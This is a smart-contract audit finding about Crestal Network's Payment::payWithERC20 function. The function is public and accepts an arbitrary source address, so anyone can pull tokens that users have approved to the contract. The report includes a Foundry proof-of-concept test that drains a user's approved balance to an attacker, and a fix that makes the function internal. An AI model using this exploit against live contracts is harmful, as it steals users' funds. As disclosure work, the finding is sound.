Stale Hotpink Kitten

High

# Attacker will DoS agent creation, updating and `userTopUp` through `Payment::payWithERC20` function

### Summary

The public function [`Payment::payWithERC20`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25) that is inherited in the [`BlueprintCore`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L8C35-L8C42) contract allows an attacker to front-run a legitimate user and deplete their approved token balance due to the arbitrary from in the [`safeTransferFrom`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L31). This prevents the user from successfully executing their intended transaction when there is a fee set to create and update an agent, leading to a denial-of-service (DoS).

### Root Cause

The function [`Payment::payWithERC20`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25) is public and allows an arbitrary from address in [`safeTransferFrom`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L31). It is used to pay for fees in the [`BlueprintCore::createAgent`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L464), [`BlueprintCore::updateWorkerDeploymentConfigCommon`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L650) and [`BlueprintCore::userTopUp`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L756) and since it is callable by anyone, an attacker can exploit this by transferring approved tokens from users to themselves before the user can execute their intended transaction which will cause DoS.

### Internal Pre-conditions

1. The admin sets the [`setCreateAgentTokenCost`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Blueprint.sol#L54) to more than 0

### External Pre-conditions

N/A

### Attack Path

1. A user approves the Blueprint contract to spend a certain amount of their tokens.
2. The user attempts to create an agent by calling any of the create agent functions, which now requires a token fee.
3. The attacker front-runs the transaction by calling `payWithERC20`, transferring the approved tokens to themselves before the user's transaction executes.
4. The user's transaction fails due to insufficient balance.

### Impact

Users are unable to create and update agents if there is a create agent fee and unable to call `userTopUp` at any time, resulting in a denial-of-service

### PoC

Add the following test to `BlueprintV5.t.sol` 

```solidity
    function test_feeFrontRunDoS() public {
        address user = makeAddr("user");
        address attacker = makeAddr("attacker");
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";

        // Setup
        blueprint.addPaymentAddress(address(mockToken));
        uint256 validTokenAmount = 100 * 10 ** 18;
        mockToken.mint(user, validTokenAmount);

        // 1. The create agent token cost is set to > 0
        blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);

        // 2. The user approves the blueprint contract to spend the tokens to create the agent
        vm.prank(user);
        mockToken.approve(address(blueprint), validTokenAmount);

        // 3. The attacker front runs the user, takes their approved tokens and the user no longer has the funds to create the agent
        vm.prank(attacker);
        blueprint.payWithERC20(address(mockToken), validTokenAmount, user, attacker);

        // 4. The user create agent transaction fails
        vm.expectRevert("ERC20: transfer amount exceeds balance");
        vm.prank(user);
        blueprint.createAgentWithToken(projectId, base64Proposal, workerAddress, serverURL, address(mockToken));

        uint256 balanceUser = mockToken.balanceOf(user);
        uint256 balanceAttacker = mockToken.balanceOf(attacker);
        assertEq(balanceUser, 0);
        assertEq(balanceAttacker, validTokenAmount);
        console.log("User balance:", balanceUser);
        console.log("Attacker balance: ", balanceAttacker);
    }
```

```solidity
[PASS] test_feeFrontRunDoS() (gas: 193917)
Logs:
  User balance: 0
  Attacker balance:  100000000000000000000
```

### Mitigation

Make the `Payment::payWithERC20` function internal so that it can't be called by external users

```diff
- function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
+ function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) internal {
```